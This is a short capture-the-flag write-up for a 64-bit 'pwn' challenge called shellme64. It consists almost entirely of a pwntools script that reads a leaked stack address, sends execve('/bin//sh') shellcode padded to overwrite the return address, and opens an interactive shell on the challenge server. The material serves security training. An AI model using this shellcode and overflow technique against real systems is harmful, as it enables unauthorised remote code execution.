shellme64 [pwn]

shellme64

Same concept, more bytes.

Exploit

from pwn import *
import sys

c = remote("chal.tuctf.com", 30507)

shellcode = "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

leak = int(c.readuntil("> ").split("\n")[1], 0)
print "LEAK = %x" % (leak)
buf = shellcode + "\x90"*(40-len(shellcode)) + struct.pack("<Q", leak)

c.send(buf)
c.interactive()